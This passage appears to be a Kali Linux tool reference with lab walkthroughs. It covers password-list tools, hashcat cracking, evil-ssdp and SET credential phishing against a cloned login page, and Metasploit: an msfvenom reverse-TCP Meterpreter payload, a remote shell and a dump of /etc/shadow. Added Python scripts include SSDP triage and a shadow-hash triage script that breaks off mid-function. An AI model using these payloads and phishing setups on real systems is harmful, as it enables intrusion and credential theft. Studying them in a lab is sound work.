This will make the -b and -f options substantially faster
-t number Number of threads to use
-p prime Force size of hash table
-b Use binary search vs hash (slower, but less memory)
-2 Use rli2 mode - all files must be sorted. Low mem usage.
-f Use files instead of memory (slower, but small memory)
-l [len] Limit all matching to a specific length.
-M memsize Maximum memory to use for -f mode
-T path Directory to store temp files in
-q [cahwl] Do frequency analysis on input
a - all output, c - count, l - length, w - word,
s - running statistics, h - append histogram
Additional files will be matched against input files
-h This help
stdin and stdout can be used in the place of any filename
■ Example usage
# Remove the passwords that also appear in ignore-passwords.txt from all-passwords.txt and write the rest to new-passwords.txt
root@kali:~# rling all-passwords.txt new-passwords.txt ignore-passwords.txt
Reading "all-passwords.txt"...3491 bytes total in 0.0001 seconds
Counting lines...Found 499 lines in 0.0004 seconds
Optimal HashPrime is 1543
Estimated memory required: 104,881,451 (100.02Mbytes)
Processing input list... 499 unique (0 duplicate lines) in 0.0014 seconds
Occupancy is 433/1543 28.0622%, Maxdepth=2
Removing from "ignore-passwords.txt"... 248 removed
248 total lines removed in 0.0003 seconds
Writing to "new-passwords.txt"
Wrote 251 lines in 0.0022 seconds
Total runtime 0.0045 seconds
root@kali:~# wc -l huge-passwords.txt
43033173 huge-passwords.txt
# Remove duplicate lines from huge-passwords.txt
root@kali:~# rling huge-passwords.txt huge-passwords.txt
Reading "huge-passwords.txt"...419764491 bytes total in 0.1321 seconds
Counting lines...Found 43033173 lines in 0.1581 seconds
Optimal HashPrime is 100663319
Estimated memory required: 2,018,459,443 (1.88Gbytes)
Processing input list... 14344879 unique (28688294 duplicate lines) in 2.6272 seconds
Occupancy is 13369642/100663319 13.2815%, Maxdepth=4
0 total lines removed in 0.0000 seconds
Writing to "huge-passwords.txt"
Wrote 14,344,879 lines in 0.2657 seconds
Total runtime 3.1833 seconds
# 43033173 lines -> 14344879 lines
root@kali:~# wc -l huge-passwords.txt
14344879 huge-passwords.txt
RSMangler
Creates words in various combinations from the words it is given.
■ Usage
root@kali:~# rsmangler --help
Basic usage:
rsmangler --file wordlist.txt
To pass the initial words in on standard in do:
cat wordlist.txt | rsmangler
To send the output to a file:
rsmangler --file wordlist.txt --output mangled.txt
All options are ON by default, these parameters turn them OFF
Usage: rsmangler [OPTION]
--help, -h: show help
--file, -f: the input file, use - for STDIN
--output, -o: the output file, use - for STDOUT
--max, -x: maximum word length
--min, -m: minimum word length
--perms, -p: permutate all the words
--double, -d: double each word
--reverse, -r: reverser the word
--leet, -t: l33t speak the word
--full-leet, -T: all posibilities l33t
--capital, -c: capitalise the word
--upper, -u: uppercase the word
--lower, -l: lowercase the word
--swap, -s: swap the case of the word
--ed, -e: add ed to the end of the word
--ing, -i: add ing to the end of the word
--punctuation: add common punctuation to the end of the word
--years, -y: add all years from 1990 to current year to start and end
--acronym, -a: create an acronym based on all the words entered in order and add to word list
--common, -C: add the following words to start and end: admin, sys, pw, pwd
--pna: add 01 - 09 to the end of the word
--pnb: add 01 - 09 to the beginning of the word
--na: add 1 - 123 to the end of the word
--nb: add 1 - 123 to the beginning of the word
--force: don't check output size
--space: add spaces between words
--allow-duplicates: allow duplicates in the output list
■ Example usage
root@kali:~# echo -e "hello\nworld" | rsmangler -d -r -t -T -c -u -l -s -e -i -y -a -C --pna --pnb --na --nb --punctuation --file -
hello
world
helloworld
worldhello
root@kali:~# echo -e "hello\nworld" | rsmangler -p -r -t -T -c -u -l -s -e -i -y -a -C --pna --pnb --na --nb --punctuation --file -
hellohello
worldworld
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -t -T -c -u -l -s -e -i -y -a -C --pna --pnb --na --nb --punctuation --file -
olleh
dlrow
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -r -t -c -u -l -s -e -i -y -a -C --pna --pnb --na --nb --punctuation --file -
h3110
h31!0
h3!10
h3!!0
w0r1d
w0r!d
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -r -t -T -c -u -l -s -e -i -a -C --pna --pnb --na --nb --punctuation --file -
1990hello
hello1990
1991hello
hello1991
[...]
2020world
world2020
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -r -t -T -c -u -l -s -e -i -y -C --pna --pnb --na --nb --punctuation --file -
hw
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -r -t -T -c -u -l -s -e -i -y -a --pna --pnb --na --nb --punctuation --file -
pwhello
hellopw
pwdhello
hellopwd
adminhello
helloadmin
syshello
hellosys
pwworld
worldpw
pwdworld
worldpwd
adminworld
worldadmin
sysworld
worldsys
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -r -t -T -c -u -l -s -e -i -y -a -C --pnb --na --nb --punctuation --file -
hello01
hello02
hello03
[...]
world09
root@kali:~# echo -e "hello\nworld" | rsmangler -p -d -r -t -T -c -u -l -s -e -i -y -a -C --pna --pnb --nb --punctuation --file -
hello1
hello2
[...]
hello122
hello123
world1
world2
[...]
world122
world123
Statsprocessor
Generates word lists based on Markov chains.
■ Usage
root@kali:~# sp64 --help
Usage: sp64 [options]... hcstat-file [filter-mask]
* Startup:
-V, --version Print version
-h, --help Print help
* Increment:
--pw-min=NUM Start incrementing at NUM
--pw-max=NUM Stop incrementing at NUM
* Markov:
--markov-disable Emulates maskprocessor output
--markov-classic No per-position tables
--threshold=NUM Filter out chars after NUM chars added
Set to 0 to disable
* Misc:
--combinations Calculate number of combinations
--hex-charset Assume charset is given in hex
* Resources:
-s, --skip=NUM skip number of words (for restore)
-l, --limit=NUM limit number of words (for distributed)
* Files:
-o, --output-file=FILE Output-file
* Custom charsets:
-1, --custom-charset1=CS User-defineable charsets
-2, --custom-charset2=CS Example:
-3, --custom-charset3=CS --custom-charset1=?dabcdef
-4, --custom-charset4=CS sets charset ?1 to 0123456789abcdef
* Built-in charsets:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?h = 8 bit characters from 0xc0 - 0xff
?D = 8 bit characters from german alphabet
?F = 8 bit characters from french alphabet
?R = 8 bit characters from russian alphabet
■ Example usage
# Generate 100 random 8-digit numbers
root@kali:~# for i in {1..100}; do echo $(openssl rand -base64 128 | tr -dc 0-9 | head -c 8); done > numbers.txt
# Build Markov statistics from the generated numbers
root@kali:~# cat numbers.txt | /usr/lib/hashcat-utils/hcstatgen.bin hashcat.hcstat
# Generate a list of 8-digit numbers from the Markov statistics
root@kali:~# sp64 --pw-min 8 --pw-max 8 hashcat.hcstat ?d?d?d?d?d?d?d?d > markov-numbers.txt
# Pick 10 of the original 100 numbers at random and hash them with MD5
root@kali:~# shuf numbers.txt | head -n 10 | while read line; do echo -n "$line" | md5sum | cut -d' ' -f1; done > hashes.txt
# Crack the 10 hashes by brute force
root@kali:~# hashcat -a 3 -m 0 --increment --increment-min 8 --increment-max 8 hashes.txt ?d?d?d?d?d?d?d?d
[...]
8c65bfebb42d551bd3adf126b28bffd0:62846032
a8006e2315a54e39f064110f3ca22cc5:13457221
cd8e82777c4f045ae4e9fca158a70ffc:82198660
ed1869c42c4c7babd7e22cd2a2555433:84409371
09cbd31095eb9d25e9317788b020ecc3:82526908
dda26fecefc8883c70bcfb40c2ea94b7:32256862
075baee80c111d843601e4d290db85f2:89107840
3443bb68543a58bcd871f358eacd0c38:85000872
1e5b8e6ddb9741cc7b9cc186fd72657e:06670396
8d280f181ee3695671669c09e9204350:87104346
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: hashes.txt
Time.Started.....: Tue Nov 19 04:13:28 2024 (0 secs)
Time.Estimated...: Tue Nov 19 04:13:28 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Mask.......: ?d?d?d?d?d?d?d?d [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 184.2 MH/s (7.13ms) @ Accel:256 Loops:1000 Thr:1 Vec:8
Recovered........: 10/10 (100.00%) Digests (total), 10/10 (100.00%) Digests (new)
Progress.........: 73728000/100000000 (73.73%)
Rejected.........: 0/73728000 (0.00%)
Restore.Point....: 71680/100000 (71.68%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1000 Iteration:0-1000
Candidate.Engine.: Device Generator
Candidates.#1....: 12347537 -> 68860346
Started: Tue Nov 19 04:13:00 2024
Stopped: Tue Nov 19 04:13:30 2024
# Crack the 10 hashes with the list generated from the Markov statistics
# Building the dictionary cache makes this take longer than the brute-force run,
# but brute force needed 73.73% of the 100000000 candidates to finish,
# while the list finished at 50.25% of the 100000000
root@kali:~# hashcat -a 0 -m 0 hashes.txt markov-numbers.txt
[...]
Dictionary cache built:
* Filename..: markov-numbers.txt
* Passwords.: 100000000
* Bytes.....: 900000000
* Keyspace..: 100000000
* Runtime...: 7 secs
3443bb68543a58bcd871f358eacd0c38:85000872
1e5b8e6ddb9741cc7b9cc186fd72657e:06670396
a8006e2315a54e39f064110f3ca22cc5:13457221
dda26fecefc8883c70bcfb40c2ea94b7:32256862
09cbd31095eb9d25e9317788b020ecc3:82526908
cd8e82777c4f045ae4e9fca158a70ffc:82198660
8d280f181ee3695671669c09e9204350:87104346
8c65bfebb42d551bd3adf126b28bffd0:62846032
075baee80c111d843601e4d290db85f2:89107840
ed1869c42c4c7babd7e22cd2a2555433:84409371
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: hashes.txt
Time.Started.....: Tue Nov 19 04:19:44 2024 (17 secs)
Time.Estimated...: Tue Nov 19 04:20:01 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (markov-numbers.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2775.8 kH/s (0.24ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 10/10 (100.00%) Digests (total), 10/10 (100.00%) Digests (new)
Progress.........: 50245632/100000000 (50.25%)
Rejected.........: 0/50245632 (0.00%)
Restore.Point....: 50241536/100000000 (50.24%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 84919039 -> 84211496
Started: Tue Nov 19 04:19:12 2024
Stopped: Tue Nov 19 04:20:03 2024
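Why the Markov-ordered list finished at 50% where plain ?d?d?d?d?d?d?d?d needed 74%, as an added example (not statsprocessor's or hashcat-utils' code): the per-position tables hcstatgen derives from a word list, walked the way sp64 walks them, with the most likely character first at every position and a --threshold cut. The training sample is constructed and the table layout is this example's own simplification of the hcstat format.

```python
"""Added example, not statsprocessor's or hashcat-utils' code: build
per-position Markov tables from a word list and walk them most likely
character first, the way sp64 generates candidates."""
from collections import Counter, defaultdict

DIGITS = "0123456789"   # the ?d charset used in the sp64 run above


def hcstat(words, charset=DIGITS):
    """root[c]: how often c starts a word; trans[pos][prev][c]: how often c
    follows prev at position pos. Words with characters outside charset are skipped."""
    root = Counter()
    trans = defaultdict(lambda: defaultdict(Counter))
    for w in words:
        if not w or any(c not in charset for c in w):
            continue
        root[w[0]] += 1
        for pos in range(1, len(w)):
            trans[pos][w[pos - 1]][w[pos]] += 1
    return root, trans


def ordered_charset(counter, charset, threshold=0):
    """charset sorted most frequent first (unseen characters keep charset
    order), cut to threshold entries; 0 keeps all (sp64 --threshold)."""
    ordered = sorted(charset, key=lambda c: (-counter[c], charset.index(c)))
    return ordered[:threshold] if threshold else ordered


def sp(root, trans, length, charset=DIGITS, threshold=0, prefix=""):
    """Yield every candidate of the given length; the rightmost position
    varies fastest and each position's order depends on the previous character."""
    if len(prefix) == length:
        yield prefix
        return
    pos = len(prefix)
    counter = root if pos == 0 else trans[pos][prefix[-1]]
    for c in ordered_charset(counter, charset, threshold):
        yield from sp(root, trans, length, charset, threshold, prefix + c)


def markov_rank(root, trans, target, charset=DIGITS):
    """0-based position of target in Markov order (None if never produced);
    in plain incremental ?d order its position is simply int(target)."""
    for i, cand in enumerate(sp(root, trans, len(target), charset)):
        if cand == target:
            return i
    return None


# Constructed training sample: PINs that are mostly years, the kind of bias
# the Markov tables are meant to exploit.
SAMPLE = ["1984", "1990", "1999", "2001", "2010", "2019", "2020",
          "1975", "1988", "2024", "2023", "2000"]

if __name__ == "__main__":
    root, trans = hcstat(SAMPLE)
    print("first candidates:", list(sp(root, trans, 4))[:8])
    print("rank of 2019: markov", markov_rank(root, trans, "2019"),
          "vs incremental", int("2019"))
```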
WordlistRaider
Extracts the words matching given conditions from a word list and creates a new list from them.
■ Usage
root@kali:~# wordlistraider --help
usage: wordlistraider [-h] -w path to source file -t path to the target file [--min MIN] [--max MAX] [-n NUMBERS] [-s SPECIALCHARACTERS]
options:
-h, --help show this help message and exit
-w path to source file, --wordlist path to source file
the wordlist to raid
-t path to the target file, --target path to the target file
the target wordlist
--min MIN, --minlength MIN
minimum length of password (default: 8)
--max MAX, --maxlength MAX
maximum length of password
-n NUMBERS, --numbers NUMBERS
password must include numbers (default: false)
-s SPECIALCHARACTERS, --specialcharacters SPECIALCHARACTERS
includes passwords with special characters (default: false)
■ Example usage
root@kali:~# cat rockyou.txt | wc -l
14344391
# Create a new list of words made up of letters only
root@kali:~# wordlistraider -w rockyou.txt -t out.txt --min 8 --max 12
root@kali:~# cat out.txt | wc -l
106284
root@kali:~# head -n 5 out.txt
password
iloveyou
princess
babygirl
michelle
# Create a list of words made up of letters or digits
root@kali:~# wordlistraider -w rockyou.txt -t out.txt --min 8 --max 12 --numbers true
root@kali:~# cat out.txt | wc -l
255013
root@kali:~# head -n 5 out.txt
123456789
password
iloveyou
princess
12345678
Social Engineering
Evil SSDP
Spoofs SSDP (Simple Service Discovery Protocol) responses to present a fake UPnP device and steal credentials and other information from targets.
■ Usage
root@kali:~# evil-ssdp --help
usage: evil_ssdp.py [-h] [-p PORT] [-t TEMPLATE] [-s SMB] [-b] [-r REALM] [-u URL] [-a] interface
positional arguments:
interface Network interface to listen on.
options:
-h, --help show this help message and exit
-p PORT, --port PORT Port for HTTP server. Defaults to 8888.
-t TEMPLATE, --template TEMPLATE
Name of a folder in the templates directory. Defaults to "office365". This will determine xml and phishing pages used.
-s SMB, --smb SMB IP address of your SMB server. Defalts to the primary address of the "interface" provided.
-b, --basic Enable base64 authentication for templates and write credentials to log file.
-r REALM, --realm REALM
Realm when prompting target for authentication via Basic Auth.
-u URL, --url URL Redirect to this URL. Works with templates that do a POST for logon forms and with templates that include the custom redirect JavaScript
(see README for more info).[example: -r https://google.com]
-a, --analyze Run in analyze mode. Will NOT respond to any SSDP queries, but will still enable and run the web server for testing.
■ Example usage
root@kali:~# evil-ssdp eth0 -t office365
[...]
########################################
[*] EVIL TEMPLATE: /usr/share/evil-ssdp/templates/office365
[*] MSEARCH LISTENER: eth0
[*] DEVICE DESCRIPTOR: http://192.168.11.3:8888/ssdp/device-desc.xml
[*] SERVICE DESCRIPTOR: http://192.168.11.3:8888/ssdp/service-desc.xml
[*] PHISHING PAGE: http://192.168.11.3:8888/ssdp/present.html
[*] SMB POINTER: file://///192.168.11.3/smb/hash.jpg
########################################
[M-SEARCH] New Host 192.168.11.4, Service Type: upnp:rootdevice
[M-SEARCH] New Host 192.168.11.4, Service Type: urn:schemas-wifialliance-org:device:WFADevice:1
[XML REQUEST] Host: 192.168.11.4, User-Agent: FDSSDP
GET /ssdp/device-desc.xml
[M-SEARCH] New Host 192.168.11.4, Service Type: urn:schemas-upnp-org:device:InternetGatewayDevice:1
[XML REQUEST] Host: 192.168.11.4, User-Agent: Microsoft-Windows/10.0 UPnP/1.0
GET /ssdp/device-desc.xml
[M-SEARCH] New Host 192.168.11.4, Service Type: uuid:5ba2b1bb-9c1b-4b76-9650-391da7e852ea
[XML REQUEST] Host: 192.168.11.4, User-Agent: Microsoft-Windows/10.0 UPnP/1.0
GET /ssdp/device-desc.xml
[XML REQUEST] Host: 192.168.11.4, User-Agent: DAFUPnP
GET /ssdp/device-desc.xml
A device named Office365 Backups appears in the network view.
Double-clicking the device opens a login page in the browser; credentials are entered there.
The entered credentials are shown on the console.
[XML REQUEST] Host: 192.168.11.4, User-Agent: Microsoft-Windows/10.0 UPnP/1.0
GET /ssdp/device-desc.xml
[XML REQUEST] Host: 192.168.11.4, User-Agent: DAFUPnP
GET /ssdp/device-desc.xml
[PHISH HOOKED] Host: 192.168.11.4, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
GET /present.html
[CREDS GIVEN] HOST: 192.168.11.4, FORM-POST CREDS: username=hello&password=world
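Added here as a defender-side example (not evil-ssdp's own code): triage of an SSDP reply and of the device descriptor its LOCATION header points to, checking for the traces the session above leaves, that is, a descriptor served by a host absent from the UPnP inventory, a LOCATION that does not match the sender, and file:// (SMB) pointers inside the descriptor. The inventory set, the reply and the descriptor are constructed; where evil-ssdp actually places its SMB pointer is not shown on this page, so the file:// URL sits in an icon element purely to exercise that check.

```python
"""Added example, not evil-ssdp's own code: triage an SSDP M-SEARCH reply and
the UPnP device descriptor it points to."""
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

NS = {"d": "urn:schemas-upnp-org:device-1-0"}
# Hypothetical inventory of the UPnP devices expected on this segment.
KNOWN_UPNP_HOSTS = {"192.168.11.1"}


def parse_ssdp_response(raw):
    """Header dict (upper-cased names) of an 'HTTP/1.1 200 OK' SSDP reply, or None."""
    lines = raw.replace("\r\n", "\n").split("\n")
    if not lines[0].startswith("HTTP/1.1 200"):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().upper()] = value.strip()
    return headers


def triage_response(src_ip, raw, known_hosts=KNOWN_UPNP_HOSTS):
    """Findings for one reply received over UDP from src_ip."""
    headers = parse_ssdp_response(raw)
    if headers is None or "LOCATION" not in headers:
        return ["malformed SSDP response (no status line or LOCATION)"]
    host = urlparse(headers["LOCATION"]).hostname
    findings = []
    if host != src_ip:
        findings.append(f"LOCATION host {host} differs from responder {src_ip}")
    if host not in known_hosts:
        findings.append(f"descriptor host {host} is not in the UPnP inventory")
    return findings


def triage_descriptor(xml_text, location):
    """Findings for a device description fetched from location, plus the
    friendlyName the device shows up under in the network view."""
    root = ET.fromstring(xml_text)  # expat does not fetch external entities
    device = root.find("d:device", NS)
    if device is None:
        return "", ["descriptor has no <device> element"]
    name = device.findtext("d:friendlyName", default="", namespaces=NS)
    loc_host = urlparse(location).hostname
    findings = []
    pres = device.findtext("d:presentationURL", default="", namespaces=NS)
    if pres and urlparse(pres).hostname not in (None, loc_host):
        findings.append(f"presentationURL {pres} points away from the descriptor host")
    for el in root.iter():
        text = (el.text or "").strip()
        if text.lower().startswith("file:") or text.startswith("\\\\"):
            findings.append(f"UNC/SMB pointer in <{el.tag.split('}')[-1]}>: {text}")
    return name, findings


# Constructed reply and descriptor modelled on the console output above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "CACHE-CONTROL: max-age=1800\r\n"
    "ST: upnp:rootdevice\r\n"
    "USN: uuid:00000000-0000-0000-0000-000000000000::upnp:rootdevice\r\n"
    "LOCATION: http://192.168.11.3:8888/ssdp/device-desc.xml\r\n"
    "SERVER: Constructed/1.0 UPnP/1.0\r\n\r\n")

SAMPLE_DESCRIPTOR = """<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
  <specVersion><major>1</major><minor>0</minor></specVersion>
  <device>
    <deviceType>urn:schemas-upnp-org:device:Basic:1</deviceType>
    <friendlyName>Office365 Backups</friendlyName>
    <manufacturer>Constructed Sample</manufacturer>
    <UDN>uuid:00000000-0000-0000-0000-000000000000</UDN>
    <presentationURL>http://192.168.11.3:8888/ssdp/present.html</presentationURL>
    <iconList><icon><url>file://///192.168.11.3/smb/hash.jpg</url></icon></iconList>
  </device>
</root>"""

if __name__ == "__main__":
    for f in triage_response("192.168.11.3", SAMPLE_RESPONSE):
        print("[!]", f)
    name, findings = triage_descriptor(
        SAMPLE_DESCRIPTOR, "http://192.168.11.3:8888/ssdp/device-desc.xml")
    print(f"[*] device '{name}'")
    for f in findings:
        print("[!]", f)
```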
Social-Engineer Toolkit (SET)
A framework for social-engineering attacks. It ships with many built-in attack vectors that let you stage a convincing attack quickly.
■ Usage example
root@kali_1:~# setoolkit
[...]
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
set> 1
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules
set> 2
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method
set:webattack> 3
[...]
1) Web Templates
2) Site Cloner
3) Custom Import
set:webattack> 2
[...]
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.11.3]: 192.168.11.3
[...]
set:webattack> Enter the url to clone: https://qiita.com/login
[...]
[*] The Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
# Enter credentials on the cloned login page and log in; the harvester prints what was submitted
[*] WE GOT A HIT! Printing the output:
PARAM: authenticity_token=GtWS8sj0m9suM49jr9wD1YkRhBc7pOm2HfjPEFFStP7wZWhyiC5sv8cuIFkWd-ofnDr99749YmxakvdGSW8TXQ
PARAM: identity=hello@example.com
POSSIBLE PASSWORD FIELD FOUND: password=helloworld
PARAM: commit=Log+in+to+Qiita
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
Multi-purpose Toolkit
Metasploit Framework
Provides the assets a security assessment needs: a large collection of exploits, an exploit-development environment, network reconnaissance tools, web vulnerability plugins and more.
[ msfconsole ]
■ Usage
root@kali:~# msfconsole --help
Usage: msfconsole [options]
Common options:
-E, --environment ENVIRONMENT Set Rails environment, defaults to RAIL_ENV environment variable or 'production'
Database options:
-M, --migration-path DIRECTORY Specify a directory containing additional DB migrations
-n, --no-database Disable database support
-y, --yaml PATH Specify a YAML file containing database settings
Framework options:
-c FILE Load the specified configuration file
-v, -V, --version Show version
Module options:
--[no-]defer-module-loads Defer module loading unless explicitly asked
-m, --module-path DIRECTORY Load an additional module path
Console options:
-a, --ask Ask before exiting Metasploit or accept 'exit -y'
-H, --history-file FILE Save command history to the specified file
-l, --logger STRING Specify a logger to use (Flatfile, Stderr, Stdout, StdoutWithoutTimestamps, TimestampColorlessFlatfile)
--[no-]readline
-L, --real-readline Use the system Readline library instead of RbReadline
-o, --output FILE Output to the specified file
-p, --plugin PLUGIN Load a plugin on startup
-q, --quiet Do not print the banner on startup
-r, --resource FILE Execute the specified resource file (- for stdin)
-x, --execute-command COMMAND Execute the specified console commands (use ; for multiples)
-h, --help Show this message
■ Usage example
root@kali:~# msfconsole
# Enumerate host details over SNMP
msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.11.4
msf6 auxiliary(scanner/snmp/snmp_enum) > set VERSION 2c
msf6 auxiliary(scanner/snmp/snmp_enum) > run
[+] 192.168.11.4, Connected.
[*] System information:
Host IP : 192.168.11.4
Hostname : server4test
Description : Linux server4test 5.15.153.1 #1 SMP Fri Mar 29 23:14:13 UTC 2024 x86_64
Contact : msfdev@metasploit.com
Location : Metasploit Lab
Uptime snmp : 06:54:27.07
Uptime system : 00:00:23.50
System date : 2024-10-23 03:30:46.0
[...]
[*] TCP connections and listening ports:
Local address Local port Remote address Remote port State
0.0.0.0 21 0.0.0.0 0 listen
0.0.0.0 23 0.0.0.0 0 listen
0.0.0.0 25 0.0.0.0 0 listen
0.0.0.0 80 0.0.0.0 0 listen
0.0.0.0 111 0.0.0.0 0 listen
0.0.0.0 139 0.0.0.0 0 listen
0.0.0.0 445 0.0.0.0 0 listen
0.0.0.0 512 0.0.0.0 0 listen
0.0.0.0 513 0.0.0.0 0 listen
0.0.0.0 514 0.0.0.0 0 listen
0.0.0.0 1099 0.0.0.0 0 listen
0.0.0.0 1524 0.0.0.0 0 listen
0.0.0.0 3306 0.0.0.0 0 listen
0.0.0.0 5432 0.0.0.0 0 listen
[...]
[*] Storage information:
Description : ["Physical memory"]
Device id : [#<SNMP::Integer:0x00007f82bcfd3c48 @value=1>]
Filesystem type : ["Ram"]
Device unit : [#<SNMP::Integer:0x00007f82bcfd1b50 @value=1024>]
Memory size : 7.71 GB
Memory used : 1.88 GB
Description : ["Virtual memory"]
Device id : [#<SNMP::Integer:0x00007f82bcfdbc40 @value=3>]
Filesystem type : ["Virtual Memory"]
Device unit : [#<SNMP::Integer:0x00007f82bcfd9210 @value=1024>]
Memory size : 9.71 GB
Memory used : 1.88 GB
[...]
[ msfvenom ]
■ Usage
root@kali:~# msfvenom --help
Usage: /usr/bin/msfvenom [options] <var=val>
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>\'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--service-name <value> The service name to use when generating a service binary
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
■ Usage example
# Build a Meterpreter payload to run on the target host
root@kali:~# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.11.3 LPORT=4444 -f elf -o meterpreter
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: meterpreter
root@kali:~# msfconsole
# Start a handler to catch the connection back from the target (LHOST is normally the address the payload was built with, 192.168.11.3 here; a handler bound to 127.0.0.1 only catches the connection when the target's traffic is delivered to the loopback interface, as in the output below)
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 127.0.0.1:4444
# Copy the generated Meterpreter binary to the target host and run it; a session is established between the two hosts
[*] Sending stage (1017704 bytes) to 192.168.11.4
[*] Meterpreter session 1 opened (192.168.11.3:4444 -> 192.168.11.4:41018) at 2024-10-23 11:33:16 +0000
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
# Run a shell on the target host
meterpreter > shell
Process 396 created.
Channel 3 created.
# hostname shows the target's host name
hostname
server4test
exit
# Dump the target's password hashes
meterpreter > cat /etc/shadow
root:*:19974:0:99999:7:::
daemon:*:19974:0:99999:7:::
bin:*:19974:0:99999:7:::
sys:*:19974:0:99999:7:::
sync:*:19974:0:99999:7:::
[...]
hello:$y$j9T$NODsKcm9YeFgRqGmdGhWL.$0fvMjjFmB7XR5WUiEamyohG.kpPNz2lbNI1kKT3yJzD:20019:0:99999:7:::
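Once /etc/shadow has been read through the Meterpreter session, the next question is which rows are actually worth cracking: `*` and `!` entries have no hash, a `!`-prefixed hash is locked for password login but still crackable (and may be reused elsewhere), and the `$y$` yescrypt format shown above is not something hashcat can take. The following script is an added example (not Metasploit code) that does that triage; the shadow text is constructed after the output above, with the yescrypt row taken from it and the other hashes being made-up placeholders in the right format.

```python
"""Triage a dumped /etc/shadow: which accounts carry a crackable hash and which tool/mode fits.
Added example, not Metasploit code. The shadow text below is constructed after the output
shown above; only the yescrypt row is from there, the other hashes are format placeholders."""
import re
from collections import defaultdict

# crypt(3) prefix -> (algorithm, hashcat -m mode, or None where hashcat has no kernel for it)
CRYPT_PREFIXES = {
    "$1$": ("md5crypt", 500),
    "$2a$": ("bcrypt", 3200),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
    "$y$": ("yescrypt", None),   # John the Ripper handles it via its libxcrypt-backed 'crypt' format
}


def classify_hash(field: str) -> dict:
    """Classify one shadow password field."""
    locked = field.startswith("!")          # leading '!' disables password login but keeps the hash
    bare = field.lstrip("!")
    if bare == "" and not locked:
        # empty field: no password at all, a finding in its own right rather than a cracking target
        return {"algo": "empty", "mode": None, "login_disabled": False, "crackable": False}
    if bare in ("", "*"):
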